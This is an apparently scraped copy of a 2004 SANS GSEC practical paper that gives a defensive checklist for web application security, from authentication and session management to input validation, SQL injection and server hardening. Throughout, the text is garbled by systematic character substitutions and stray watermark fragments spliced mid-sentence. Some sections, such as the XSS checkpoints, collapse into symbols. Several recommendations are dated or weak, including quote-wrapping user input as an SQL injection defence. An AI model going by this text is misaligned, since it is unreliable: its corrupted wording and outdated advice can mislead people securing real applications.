Security Checklist Web Application Design 1389

8/9/2019 Security Checklist Web Application Design 1389

http://slidepdf.com/reader/full/security-checklist-web-application-design-1389 1/90



Web applications are very enticing to corporations. They provide quick access to corporate resources; user-

friendly interfaces, and deployment to remote users is effortless. For the very same reasons web applications can

be a serious security risk to the corporation. Unauthorized users can find the same benefits: "quick access,"

"userfriendly," and "effortless" access to corporate data. This paper is written for

Information Technology professionals who are not programmers and may not be aware of the specific problems

p...

Copyright SANS Institute

Author Retains Full Rights



AD











retains

Author



2004,

Institute

SANS



©



Gail Zemanek Bayse

GIAC Security Essential Certification (GSEC

!ractical Assignment" #ersion $%&b

© SANS Institute 2004,As part of the Information Security Reading Room Author retains full rights.



Abstract

Web applications are 'ery enticing to corporations% hey pro'i)e *uick access to

corporate resources+ user,frien)ly interfaces" an) )eployment to remote users iseffortless% -or the 'ery same reasons .eb applications can be a serious security risk to

the corporation% /nauthori0e) users can fin) the same benefits1 2*uick access"3 2user,

frien)ly"3 an) 2effortless3 access to corporate )ata%

his paper is .ritten for Information echnology professionals .ho are. not programmers an) may not be a.are of the specific problems presente) .hen using an

pro'i)es a )escription of the security challenges intro)uce) byrightse4ternally facing .eb applications% It pro'i)es the kno.le)ge

necessary to articulate to )e'elopers the security re*uirements for a specific .eb application" to make contractual the obligation

e4ternally facing .eb application to attach to a mission critical )atabase% he content

of the )e'eloper to buil) an application that is secure" an)fullto assure that appropriate

testing is complete) prior to mo'ing to a pro)uction en'ironment% he )ocument is

structure) as a checklist of challenges% -or each challenge there are specificcheckpoints that )elineate the security concern% he checklist pro'i)es a basis for

securing .eb applications an) the )atabases they connect to from malicious an)

unintentional abuse%

Author

retains

Checklist



5isk Assessment

Authentication

Authori0ation an) Access Control



Session 6anagement

2004,

Data an) In!ut #ali)ation

Cross Site Scripting (7SS

Comman) In8ection -la.s



Institute

Buffer 9'erflo.s

Error :an)ling

SANS

;ogging



©

5emote A)ministration

Web Application an) Ser'er Configuration



i

© SANS Institute 2004,As part of the Information Security Reading Room Author retains full

rights.



Risk Assessment

Challenge1

<ot all applications use) in a secure) ;ocal Area <et.ork (;A< present a))itional

security risk% It is important to match the security re*uirements .ith the risk impose) by

the ne. application% An application that is use) by employees solely from .ithin the

;A< an) streamlines tasks alrea)y part of their functional role may re*uire no a))itional

security% :o.e'er" an e4ternally facing .eb application use) by remote employees"

consultants or 'en)ors" attaching to a mission critical )atabase poses. a 'ery )ifferent

set of concerns% E'ery )ata asset must be e4amine) an) its confi)entiality" criticality

an) 'ulnerability assesse)% It is crucial to )e'elop security proce)ures that are

appropriate to each asset=s criticality an) 'ulnerability% 2Security is almost al.ays an

o'erhea)" either incost orperformance%3$

rights

herefore" the goal is to match the le'el of

security .ith the assesse) risk to assure that latency cause)full by security an) the )ollar

amount spent securing an application are realistic an) acceptable%

An application )etermine) to be of risk to mission retainscritical )ata .ill re*uire a

thorough security component )uring its= )esign phase" in )e'elopment an)implementation" an) into maintenance% /se the follo.ing *uestions as checkpoints to

)etermine the le'el of risk

Checkpoints1 Author



• Which applications are affecte) by the re*ueste) change>

• Who are the users> Where are the users physically locate)>

• Will the application attach to mission critical applications> Will it mo)ify any

confi)ential or critical )ata> 2004,

• Will any )ata consi)ere)Institutesensiti'e or confi)ential be transmitte) o'er e4ternal communication links>

• Where shoul) a))itional user authentication be built into the application>

• Where .ill the application be physically locate) in the net.ork> In the D6Z" the

internal net.ork> Will it be installe) on ne. e*uipment or share an e4isting ser'er> Will

it coe4ist .ell .ith e4isting applications>

• If the system SANS .as compromise) .oul) it result in financial loss or the loss

of

reputation> Can you place a )ollar amount on any loss>

• What is the history of the 9S platform .ith respect to security>

• What .oul) © moti'ate someone to break into the application>

• Will the application ha'e high e4ternal 'isibility" making it an ob'ious target to

attackers>

Authentication

Challenge1



$


rights.



Authentication is a first line of )efense% he application must )etermine if the user is

.ho he?she claims to be or if the entity" a ser'er or program" is .hat it claims to be%

his is the 2I recogni0e .ho you are%3 stage% he most common form of authentication is

the user i) an) pass.or)% Authentication policies" processes" an) logging must be

)esigne)" )e'elope) an) )ocumente) to assure that the application keeps

unauthori0e) users from accessing the site% It must correctly i)entify the true o.ner of a

user i) an) pass.or)%

Checkpoints1

.

o pre'ent a user i) an)?or pass.or) from being hacke)" faile) logins shoul) trigger a

lock,out after a )etermine) number of attempts% he account lock,out shoul) be

maintaine) for a number of hours to pre'ent an) )iscourage the attacker from reissuing

the attack% he acti'ity shoul) be logge)%@

rights

All authentication attempts shoul) be

logge) log in" log outs" faile) logins" pass.or) change re*uests% In a))ition



full

notification or alerts shoul) be sent to an a)ministrator .hen the account is locke) )ue

to faile) logins%

An attacker shoul) not be able to )e)uce the user retainsi)%2Bill%ohnson3 .oul) not beconsi)ere) a strong user i)" .hile 2bi8ohn3 .oul) be less ob'ious% ;ike.ise" strong

pass.or) rules shoul) be applie)% A strongAuthorpass.or) has a minimum of se'en

characters an) it uses three of the follo.ing1 numbers" upper case letters" lo.er case

letters" an) symbols% It .ill ha'e a symbol character in the secon) si4th position% A

strong pass.or) .ill not use repeate) or se*uence) characters% It .ill look ran)om%

-inally" the pass.or) shoul) not be foun) in any )ictionary%

Implement a pass.or) e4piry time 2004, for all pass.or)s% he more critical an

application is

)eeme)" the more often the pass.or) shoul) change% -or applications re*uiring a

highly secure system" consi)er Institutet.o,factor authentication% his is a token or fob .ith

a co)e that automatically changes e'ery secon)s% It is something you ha'e (the

token=s changing co)e" an) something you kno. (a pin or passco)e" an) your user

i)%&

When a pass.or) is change)" re*uire the e4isting pass.or) to be entere) prior to

accepting a ne.SANSpass.or)% It is important to 'erify that the o.ner of the user i)



is the person re*uesting the pass.or) change% When pass.or)s are successfully

change) the program shoul) for.ar) a message to the email a))ress of the o.ner of

the user i)" an) the user shoul)© be force) to re,authenticate%

When a user forgets a pass.or)" the pass.or) must be change) rather than

2reco'ere)%3 !ass.or)s shoul) not be store) in a manner that .oul) allo. a reco'ery%

9n form base) pass.or) resets" the use of 2secret3 *uestions an) ans.ers is

recommen)e)% Again" the application shoul) force a ne. authentication follo.ing the

pass.or) reset%F

@


rights.



!ass.or)s an) user i)s must be transmitte) an) store) in a secure manner% Do not

sen) user i)s an) pass.or)s in a clear,te4t email message% Shoul) this be a necessity"

any pass.or)s sent in clear te4t must be encrypte) using Secure Socket ;ayer (SS;%

Any list of pass.or)s shoul) be hashe) (one,.ay hash to assure that an attacker is unable to rea)

authentication information% -or applications that re*uire intense security" consi)er combining a

ran)omly generate) salt 'alue .ith the pass.or) hash% Salt is 2ran)om )ata inclu)e) as part of a

session key% Salt 'alues are a))e) to increase the .ork re*uire) to mount a brute,force ()ictionary

attack3 against authentication cre)entials% If user accounts are re*uire) to be e4pose)" i%e%" in a

)rop. )o.n bo4" then an alias must be use) to protect the user i)%

Best practice recommen)s encrypting the entire logon transaction rights

.ith SS;%-orms,

base) authentication must use a !9S re*uest to assure full that the

authentication

cre)entials are not cache) to bro.ser history%

H

/sing SS; on all login pages .ill

accomplish this% 6ake use of 2no cache3 tags to further pre'ent someone from backing

up to a login page an) resubmitting a logon% Do not allo. the application to cache both

user i) an) pass.or)% 25emember me3 functionality is not recommen)e)" but if use)

shoul) allo. users to automatically sign in only to non,critical portions of the site%

<ote on SS;1

retains

to an) from .eb ser'ices% It is importantAuthortorecogni0e that SS; )oesn=t protect the .eb application% It protects the 2t ransport3 of the )ata as it mo'es bet.een the .eb

SS; can pro'i)e authentication" confi)entiality" an) integrity for )ata as it is transporte)



application ser'er an) a bro.ser% SS; is a transport layer protocol that operates

bet.een the C!?I! layer an) the Application layer .here :! operates% Being

a.are of .here SS; encryption is implemente) .ill re)uce any false sense of security

)e'elopers may ha'e .hen using SS; to secure an application%

2004,

Authorization and Access Control

Challenge1

Institute

Authentication tellsSANSauser 2I recogni0e you as a user%3 Authori0ation says 2<o.

that I kno. .ho you are I also kno. .hat you are allo.e) to )o+ .hat )ata you are

allo.e) to see an) mo)ify%3 Access control )etermines .here a user can connect from+

.hat time they can connect"© an) the type of encryption re*uire)% he goal is to

)e'elop a security strategy to protect back,en) an) front,en) )ata an) systems% his

can be accomplishe) through the use of roles" cre)entials" an) sensiti'ity labels%

Checkpoints1



During the )esign phase" user roles shoul) be )efine) base) on a 2least pri'ilege3

mo)el% If a user role .ill not be mo)ifying )ata" then the role shoul) not be gi'en any

opportunity to e)it" )elete" or a)) )ata to the critical )atabase% Document the user roles

© SANS Institute 2004,As part of the Information Security Reading Room Author retains full rights.



)uring )e'elopment an) )etermine .ho .ill hol) the responsibility for assigning users to

specific roles%

he )esigners of the .eb application shoul) ha'e a'ailable to them complete

)ocumentation of the mission critical )atabase at the conception of the pro8ect=s )esign%

It shoul) inclu)e a )escription of all fiel)s an) tables" )ata length an) e4pecte) 'alues

for a fiel)" an) any permissions assigne) to the fiel)%

Assure that users cannot 2bro.se3 past their user role rights% he user shoul) not be

able to access an unauthori0e) page by entering the location intorightsthe. /5;% Similarly" A

user shoul) not be able to enter a file path (JJser'ernameJ.inntJ)ri'ers into a /5; that

.oul) allo. a user to access an) potentially mo)ify a system file%

Assure that users= acti'ity is not cache) .hen han)ling sensiti'e information% If multiple

employees share a .orkstation" clicking the back arro. shoul) full not take a user to

the

/5; of the last users= login or their last pages 'isite)% his may result in ele'ate)

rights% retains

/se file system access rights only as a last )efense%

esting of an application prior to mo'ing it into a pro)uction en'ironment .ill inclu)e a

re'ie. of user role )ocumentation an) a re'ie. of the co)e implementing access

controls% !enetration testing .ill be necessary to assure that e'ery access control has

been teste) an) pre'ents unauthori0e) access%K



2004,

Author

Session Management

Challenge1

interception" pre)iction"Institutebrute,force" an) fi4ation% In each attack" an unauthori0e) user can hi8ack a session an)

assume the 'ali) user=s i)entity% Encrypting sessions is

A common 'ulnerability of .eb applications is cause) by not protecting account

cre)entials an) session tokens%$ here are four types of session i) attacks1

effecti'e against interception+ ran)omly assigne) session i)s protect against pre)iction+

long keyspaces ren)er brute,force attack less successful" an) forcing assignment an)

fre*uent regeneration of session i)s make fi4ation less problematic%$$

©

SANS

:! is a stateless protocol% It .ill ans.er any http re*uest% :! )oes not" by itself"

keep con'ersations in any specific or)er% It is important to use a state mechanism to

separate an) maintain an in)i'i)ual user=s acti'ities .ithin a session% A cookie is a

common 'ehicle use) to maintain state in :! sessions% he cookie allo.s a user to

make numerous :! transactions in one con'ersation% he session i) keeps the

'arious re*uests together in one con'ersation%$@



Checkpoints1

&


rights.





retains

Session i)s shoul) be protecte) .ith SS;% Session i)s shoul) change routinely an)

al.ays )uring ma8or transitions" i%e%" .hen mo'ing to an) from an SS; an) .hen

authenticating% -or highly secure transactionsAuthorre,authentication an) a ne. session i)

shoul) be issue) prior to processing the re*ueste) transaction%

9n log out" the session i) shoul) be o'er,.ritten%

2004,

Data and InPut Validation

Challenge1

nstitute



Cross,Site ScriptingSANSan) Comman) In8ection take a)'antage of a 2'iolation of trust3$H bet.een a

user accessing a kno.n an) truste) site an) an attacker% he attacker bypasses security mechanisms by

a))ing malicious co)e to open parameters in an application% An© open parameter coul) be a /5;"

LueryString" :ea)er" Cookie" -orm -iel)" or a :i))en -iel)% It is any parameter that )oes not assure that

he )ata entere) is )ata that .oul) normally be e4pecte)% -or e4ample" if the parameter is a )ate fiel)" an

he input 2in8ecte)3 into it is a script file" then the attacker has been successful in fin)ing an) using an ope

parameter% Well,.ritten co)e .oul) )iscar) the script% he importance of kno.ing an) )ocumenting .hat

kno.n as 'ali) )ata cannot be stresse) enough%

Checkpoints1

©SANS Institute 2004,As part of the Information Security Reading Room Author retains full rights.



he strongest )efense against these attacks is Input #ali)ation% If the ser'er 'ali)ates all )ata entering the

.eb application against kno.n goo) criteria" the chances of successful attack are greatly re)uce)% he

bur)en of security 'ali)ation must fall on the ser'er" an) hence the application )e'eloper" rather than the

client% Client,si)e 'ali)ation is often use) as a primary 'ali)ation to 2re)uce roun) trips to the ser'er"3 butshoul) not be use) as a security )efense%

$

he use of a common library of fiel) 'ali)ations can be use) to more efficiently an)

accurately confirm the integrity of the entry )ata%

Constrain input )eci)e .hat is allo.e) in the fiel)

#ali)ate )ata type" length" format" an) range

rights

5e8ect 2kno.n ba)3 input )o not rely only on this as it assumes the



programmer kno.s e'erything that coul) possibly be malicious%

Saniti0e Input his can inclu)e strippingretainsa null from the en) of a user,supplie) string+ escaping

'alues so they are treate) as literals" an)

:6; or /5; enco)ing to .rap )ata an) treat it as a literal%$K

6ake strict use of canonicali0ation% Mno. .hat the ser'er is e4pecting in e'ery fiel)%

All )ata input must be re)uce) to a pure format" the format that the ser'er an) )atabase e4pects% Input

'ali)ation assures that all )ata is appropriate for its meaningful purpose%

t may be necessary to establish character sets on the ser'er to establish the canonical

orm that input must take%@

Author

As note) in the Authentication section" an SS; connection is establishe) in the transport layer" after the malici

co)e is intro)uce)% It is important to recogni0e that SS; )oes

not protect against in'ali) )ata% he SS; connection sees a 'ali) con'ersation bet.een



004,

ser'er an) user an) transports the malicious co)e%

Cross Site Scripting (7SS

Challenge1

nstitute

When a .eb application creates output from user input .ithout 'ali)ating the )ata" the

output can inclu)e

SANS

malicious co)e% An attacker looks for instances in co)e .here there

s no 'ali)ation © an) inserts the attack at that point% he output that the user recei'es

may .ell carry malicious co)e% he user may recei'e a 2click here3 message" an)

rusting the 2kno.n site"3 abi)e by the hackers )esire% he result is )irecte) at the en) user rather than th

application=s infrastructure% his coul) transmit corporate confi)ential )ata to an outsi)e site% It can result

program installations or )isclosure of en) user files%@$



Checkpoints1






(

OP&

OP&$

P

OPF

@

full



O

OP

Comman) In8ection -la.s

Challenge1



Comman) in8ection fla.s allo. attackers to relay retainsmalicious co)e through the .eb

application to another system% he malicious co)e can inclu)e .hole scripts% SL;

in8ection is the most pre'alent% SL; in8ection attaches specifically to a parameter that

passes through to an SL; )atabase allo.ing an attacker to mo)ify" erase" copy" or

corrupt an entire )atabase% SL; In8ections can take the follo.ing forms1

Authori0ation (Authentication" Select Statement"Author

Insert" an) SL; Ser'er Store)

!roce)ures%@&

2004,

Checkpoints1



5e'ie. for SL; in8ection is time consuming% All parameters must be e4amine) for calls

to e4ternal sources% 5e'ie. the co)e for any instance .here input from an :!

re*uest coul) be .ritten into any of these e4ternal calls%

Buil) filters that 'erify thatInstituteonly e4pecte) )ata is inclu)e)% If symbols are

re*uire)"

assure that they are con'erte) to :6;%

!repen) an) appen) a *uote to all user input%

©

SANSSL; ser'er comes .ith a 'ariety of store) proce)ure calls% 6any are not use) in

specific applications% Gi'e users access to only the SL; store) proce)ures that are

re*uire)% All others shoul) be store) a.ay from the .eb application%@F

Where'er possible a'oi) shell comman)s an) system calls% In many cases there are

language libraries that perform the same functions .ithout using a system shell

interpreter%@ Where shell comman)s cannot be a'oi)e)" the co)e must 'ali)ate the

H


rights.



input against a 'ali) input list to ensure that it )oes not inclu)e malicious co)e%

Consi)er all supplie) input as )ata" re)ucing" though not eliminating e4ternal calls%

In the e'ent of )ata that is not acceptable" there shoul) be a mechanism in place to

block an) time out the session%

Buffer Overflos

Challenge1

.

2he buffer o'erflo. attack in'ol'es sen)ing large amounts of )ata that e4cee) the

*uantities e4pecte) by the application .ithin a gi'en fiel)%@H

Such attacks cause the

application to aban)on its normal beha'ior an) begin e4ecuting comman)s on behalf of

the attacker%3

rights

Attackers fin) buffer o'erflo. 'ulnerabilities by searching for full system calls an)

functions that )o not restrict the length an) type of input% his can be )one manually or

electronically .ith a co)e inspection tool% he attacker retainscan also run a brute force

attack against the program in the hope of fin)ing 'ulnerabilities in the co)e% 9nce the attacker

fin)s a 'ulnerability" custom co)e is inserte) that )oes not crash the system" rather

instructs it to e4ecute other comman)s or programs of the attackers )esire%

Checkpoints1

All co)e that accepts input from users 'ia an :! re*uest must be re'ie.e) to ensure

that it can i)entify large input% 9nce inappropriate )ata is i)entifie) the acti'ity must be



logge) an) the )ata )roppe)%

Author

All )ata input fiel)s must ha'e reasonable2004, fiel) lengths an) specific )ata types%

;imit the amount of te4t allo.e) in free form fiel)s%

5outinely check the co)eInstituteof.eb applications )uring their )e'elopment

phase to assure that the )esign is secure) as built%@

Insecure !se of Cr"#togra#h"

Challenge1 SANS

Apply encryption© to any part of the program that affects critical or confi)ential )ata%

Assure that all elements of encryption are securely store)% Encryption schemas shoul)

be )e'elope) by a commercial company rather than )e'elope) internally%

Encryption is fairly easy to a)) to an application" but it is often not )one correctly%

Some common mistakes are1

Insecure storage of keys" certificates" an) pass.or)s

Improper storage of secrets in memory




rights.









horoughly test the application to )etermine the possible errors% Deci)e .hat the programmatic response

.ill be to kno.n errors% Write error pages that reflect enough information to the en) user .ithout gi'ing the

user information about the co)e" the file system" or permissions%

When an error occurs that causes the program or a part of the program to fail" it is 'ital that the system .i

fail close)"3 blocking an unauthori0e) user from reaching the

operating system or the site% he action that cause) the error shoul) be logge) an)

hen blocke)%

rights

&ogging

ull







Description

;og all Authentication an) Authori0ation E'ents logging in" logging out" faile) logins%

hese shoul) inclu)e )ate?time" success?failure" resources being authori0e)" an) the

user re*uesting the authori0ation" if appropriate an I! a))ress or location of the

Authentication Attempt%

SANS

og all A)ministrator acti'ity% All of it%

;og the )eletion of any )ata%

;og any mo)ification to )ata characteristics1 permissions" location" fiel) type%

;og files are critical )ata% hey shoul) be encrypte)% If your en'ironment is highly secure consi)er W956

echnology to protect the log files from )eletion or mo)ification%






De'elop a proce)ure for archi'ing log files% Consi)er encrypting this critical )ata%

Remote Administration 'las

Challenge1

n a most secure scenario" remote a)ministration is not allo.e)% As this is not often possible" it is necessa

o )esign a secure system for remote connections to the

ser'er%

Checkpoints1

Determine ho. the site is to be a)ministere)% Document .ho has the rights to make

changes" an) .hen they can be ma)e% Determine an effecti'e 'ehicle for remote

ights

management such as a #!< solution" strong authentication .ith tokens" or certificates%





Configure ser'er )isks to allo. for the separation of the operating system an) the .eb

nstitute

Disable any ser'ices that are not use) by the .eb ser'er or applications%

Delete )efault accounts an) their )efault pass.or)s

SANS

ser'er% his .ill allo. the restriction of )irectory tra'ersal to inappropriate locations%

#erify that assigne) file an) )irectory permissions are correctly applie) using 2least pri'ilege3 mo)e%

5ename the )efault A)ministrator account or make it inaccessible% Delete all guest accounts%

Disable )ebugging functions%

E)it error messages to pro'i)e as little information as possible to a hacker%



$




Do not use self,signe) SS; certificates" or )efault certificates% Assure that SS;

certificates an) encryption settings are properly configure)%

Scan from the outsi)e net.ork to assure that all unnecessary ports are close)% 5un

port scans monthly to assure that nothing has been change)%

Assign security maintenance to an in)i'i)ual or team to be responsible for1 monitoring

latest security 'ulnerabilities+ testing an) applying the latest patches+ up)ating security

configuration gui)elines+ regular 'ulnerability scanning+ regular status reports to upper

.

management+ an) )ocumentingthe o'erallsecurity practiceorposture%

Conclusion

rights

Each of the challenges )iscusse) in this paper are a part of full2Defense in Depth%3 Shoul) any one piece of this

)efense fail or be compromise)" another layer of )efense shoul) stop an intru)er from taking complete control of the

site%

he checklist pro'i)es a foun)ation for selecting an)retainscontracting .ith an

application )e'eloper% he corporation=s re*uirements for security are clearly a'ailable to

the )e'eloper as part of the contract% he )e'eloper .ill ha'e a concrete un)erstan)ing of

Author Security re*uirements .ill change in response to the e4ternal en'ironment% What

the risk mitigation re*uirements throughout the )esign an) )e'elopment process% !rior

to mo'ing into a pro)uction" en'ironment security analysis can 'erify that all kno.n

security gaps are close)%



secure) an application to)ay may nee) to be change) tomorro.% Constant re'ie. an)

attention to the current security threat en'ironment is necessary to maintain the

application=s security%

2004,

E4ternally facing applications ha'e pro'i)e) corporations great fle4ibility an) greater

efficiencies% As e'i)ence) by the challenges of this checklist" they can also pro'i)e a

serious security risk if they attach to mission critical systems% It is imperati'e to secure

an) maintain the state of Institutesecurity throughout the life,cycle of the application%

©

SANS



$@


rights.



Bi)liogra#h"

Aspect Security" 2Common #ulnerabilities for Web Applications"3http1??...%aspectsecurity%com?com'uln%html" Accesse) anuary @" @&%

Carnegie 6ellon" Soft.are Engineering Institute" -ebruary " @" 6alicious :6;

ags Embe))e) in Client 5e*uests" ...%cert%org?a)'isories?CA,@,@%html Cook" S%"

anuary $$" @" 2A Web De'eloper=s Gui)e to Cross,Site Scripting3" SA<S

Institute GIAC !ractical 5epository" Accesse)" anuary @@" @&%

.

Curphey" 6" En)ler" D" :au" W" aylor" S" Smith" " 5ussell" A" 6cMenna" G" !arke" 5"

an) <igel" M% September @@" @@% 2A Gui)e o Buil)ing Secure Web

Applications"3 he 9pen Web Applications Security !ro8ect"

http1??...%cgisecurity%com?lib?9WAS!Buil)ingSecureWebApplicationsAn)WebS

er'ices,#$%$%p)f" Accesse) -ebruary $" @&%

rights





echnical #ulnerabilities , Buffer

2004, 9'erflo.s%p)f" Accesse) -ebruary @" @&%

6icrosoft Corporation" 2!latform SDM1 Security"3

http1??ms)n%microsoft%com?library?)efault%asp>url?library?en,

us?security?security?s

Institute

gly%asp" Accesse) -ebruary $" @&%

6icrosoft Corporation" <o'ember @&" @" 2:o. to Create Stronger !ass.or)s"3

http1??...%microsoft%com?security?articles?pass.or)%asp" Accesse) -ebruary @"

@&%

6icrosoft Corporation% Design Gui)elines for Secure Web Applications" 6SD<

6iller" C" 9ctober @" @@" 2!ass.or) 5eco'ery"3

http1??fishbo.l%pastiche%org?archi'es?)ocs?!ass.or)5eco'ery%p)f" SANS Accesse)

-ebruary $" @&%

6oore" M%" 9ctober @" 25-C @K& , /se of :! State 6echanisms3"

http1??...%fa*s%org?rfcs?rfc@K&%html"

© Accesse) -ebruary " @&

9=Gorman" ;a.rence" A'aya ;abs 5esearch" Basking 5i)ge" <" 2Securing Business=s

-ront DoorT!ass.or)" oken" an) Biometric Authentication"

http1??...%research%a'ayalabs%com?user?logorman?:ARBusinessChapter%)oc"

Accesse) -ebruary @" @&%

9b'ie4%com" anuary $&" @&" 2:o. to1 :ash .ith Salt3"

http1??...%ob'ie4%com?samples?hash?asp4

9UGorman " ;" Securing Business=s -ront Door !ass.or)" oken" an) Biometric

Authentication" A'aya ;abs 5esearch" Basking 5i)ge" <"



i

© SANS Institute 2004,As part of the Information Security Reading Room Author retains fullrights.







http1??...%spi)ynamics%com?.hitepapers?Blin) SL;In8ecti on%p)f" Accesse)

-ebruary $$" @&%

uliper" A)am" anuary @" @" “Web Application Error :an)ling in AS!%<E"”

http1??...%$Fsecon)s%com?issue?$@%htm" Accesse) -ebruary @" @&%

retains

6ulti<et" Inc" (@$"Web #ulnerabilities an) Security Solutions"



http1??elitesecure.eb%com?)ta?solutions?.'uln$%html" Accesse) -ebruary $$"

@&

$ Curphey" 6ark" En)ler" Da'i)" :au" William" aylor" Ste'e" Smith" im" 5ussell" Ale4" 6cMenna" Gene" !arke"

5ichar)" an) <igel" Me'in" (September @@" @@Author% 2A Gui)e o Buil)ing Secure Web Applications"3 he

9pen Web Applications Security !ro8ect"

http1??...%cgisecurity%com?o.asp?9WAS!Buil)ingSecureWebApplicationsAn)WebSer'ices,#$%$%p)f page



$F" -ebruary $" @&%

2004,

@ Curphey" 6% et%al% page %

6icrosoft Corporation" (<o'ember @&" @" 2:o. to Create Stronger !ass.or)s"3

http1??...%microsoft%com?security?articles?pass.or)%asp" -ebruary @" @&%



&

5SA Security" 25SA SecurIDV .o,-actor Authentication"3 http1??...%rsasecurity%com?pro)ucts?securi) " -ebruary

F

$" @&%

6iller" Charles" 2!ass.or) 5eco'ery"3 (9ctober @" @@"

http1??fishbo.l%pastiche%org?archi'es?)ocs?!ass.or)5eco'ery%p)f " -ebruary $" @&%

6icrosoft Corporation" 2!latform SDM1 Security"3 http1??ms)n%microsoft%com?library?)efault%asp>url?library?en,

H

us?security?security?sR Institutegly%asp" (-ebruary $" @&

Curphey" 6%" et% al%" p%%

Curphey" 6% page &KJ%

K

he 9pen Web Application Security !ro8ect (9WAS!" (anuary $$" @ Since superce)e) by anuary @H"@&"

2he op en 6ost Critical Web Application Security #ulnerabilities @ an) @& /p)ate" -ebruary @&"



@&" http1??pr)o.nloa)s%sourceforge%net?o.asp?9WAS!open@&%p)f>)o.nloa) " -ebruary @F" @&%

SANS

$ Aspect Security" 2Common #ulnerabilities for Web Applications"3 http1??...%aspectsecurity%com?com'uln%html "

©

-ebruary $" @&%

$$ Molsek" 6% (December @@" Session -i4ation #ulnerability In Web,Base) Applications" AC59S"

http1??...%acros%si?papers?sessionRfi4ation%p)f " -ebruary &" @&%

$@ 6oore" M%" (9ctober @" 25-C @K& , /se of :! State 6echanisms3" http1??...%fa*s%org?rfcs?rfc@K&%html"

-ebruary " @&%

$6oore" M% section @%$%

9=Gorman" ;%" A'aya ;abs 5esearch" Basking 5i)ge" <" 2Securing Business=s -ront Door !ass.or)" oken" an)

Biometric Authentication3" http1??...%research%a'ayalabs%com?user?logorman?:ARBusinessChapter%)oc" page H"

-ebruary @&" @&

Molsek" p%$$

9WAS! @" page K%

ii




rights.



H

CE5 Coor)ination Center" DoD,CE5" the DoD oint ask -orce for Computer <et.ork Defense (-,C<D" the

e)eral Computer Inci)ent 5esponse Capability (-e)CI5C" an) the <ational Infrastructure !rotection

Center (<I!C" (-ebruary " @" 26alicious :6; ags Embe))e) in Client 5e*uests3"

ttp1??...%cert%org?a)'isories?CA,@,@%html" p%@%

6eier" % D%" 6ackman" Ale4" Dunner" 6ichael" #asire))y" Srinath" Escamilla" 5ay" an) 6urukan" Anan)ha

6SD<" 2Chapter &1 Design Gui)elines for Secure Web Applications3"

ttp1??ms)n%microsoft%com?library?)efault%asp>url?library?en,us?)nnetsec?html?:C6Ch&%asp" p%HF,HH"

ebruary @&" @&%



K 6eier" %D%" et% al%" page HH

6eier" %D%" et% al%" page H

$

Cook" Stephen" (anuary $$" @" 2A Web De'eloper=s Gui)e to Cross,Site Scripting3"



@

ttp1??...%giac%org?practical?GSEC?Ste'eRCookRGSEC%p)f " -ebruary @&" @&%

9WAS!" @" page $$%

CGISecurity%com" (August" @"Cross Site Scripting Luestions an) Ans.ers3"

&

ttp1??...%cgisecurity%com?articles?4ss,fa*%shtml " -ebruary @&" @&%



Spett" Me'in" S!I Dynamics" (@@" 2SL; In8ection" Are Qour Web Applications #ulnerable>3"

F

ttp1??...%spi)ynamics%com?.hitepapers%html" -ebruary @&" @&%

ights

Spett" Me'in" S!I Dynamics" (@@" 2Blin) SL; In8ection1 Are Qour Web Applications #ulnerable>3"

ttp1??...%spi)ynamics%com?.hitepapers%html" -ebruary @&" @&%

ull

9WAS!" @" page $%



H 6ulti<et" Inc" (@$" Web #ulnerabilities an) Security Solutions"

ttp1??elitesecure.eb%com?)ta?solutions?.'uln$%html" -ebruary $$" @&

egary" 6ichael" (uly" " @" 2/n)erstan) echnical #ulnerabilities1 Buffer 9'erflo. Attacks"3





uliper" A)am" (anuary @" @" “Web Application Error :an)ling in AS!%<E"”

ttp1??...%$Fsecon)s%com?issue?$@%htm" -ebruary @" @&%

$

Curphey" 6% page F%

Author



2004,

nstitute

SANS





i




Last Updated: February 7th, 2015

Upcoming SANS Training

Click Here for a full list of all Upcoming SANS Events by Location

10th Annual ICS Security Summit

Orlando, FLUS

Feb 22, 2015 - Mar 02, 2015

Live Event

SANS Munich 2015

Munich, DE

Feb 23, 2015 - Mar 07, 2015

Live Event

SANS DFIR Monterey 2015

Monterey, CAUS

Feb 23,

2015



Feb 28, 2015

Live Event

SANS Cyber Guardian Baltimore 2015

Baltimore, MDUS

Mar 02,

2015

Mar 07, 2015

Live Event

SANS Secure Singapore 2015

Singapore, SG

Mar 09,

2015

Mar 21, 2015

Live Event





Mar 16,

2015

Mar 28, 2015

Live Event

SANS Houston 2015

Houston, TXUS

Mar 23,

2015

Mar 28, 2015

Live Event

SANS Oslo 2015

Oslo, NO

Mar 23,

2015

Mar 28, 2015

Live Event



SANS Stockholm 2015

Stockholm, SE

Mar 23,

2015

Mar 28, 2015

Live Event

SANS 2015

Orlando, FLUS

Apr 11,

2015

Apr 18, 2015

Live Event



RSA Conference 2015

San Francisco, CAUS

Apr 19,

2015

Apr 22, 2015

Live Event

Security Operations Center Summit & Training

Washington, DCUS

Apr 24, 2015 - May 01, 2015

Live Event

SANS ICS London 2015

London, GB

Apr 27, 2015 - May 02, 2015

Live Event

SANS Bahrain 2015





SANS Secure Europe 2015

Amsterdam, NL

May 05,

2015

May 25, 2015

Live Event

SANS Scottsdale 2015

OnlineAZUS

Feb 16,

2015

Feb 21, 2015

Live Event



Documents

Security Checklist Web Application Design 1389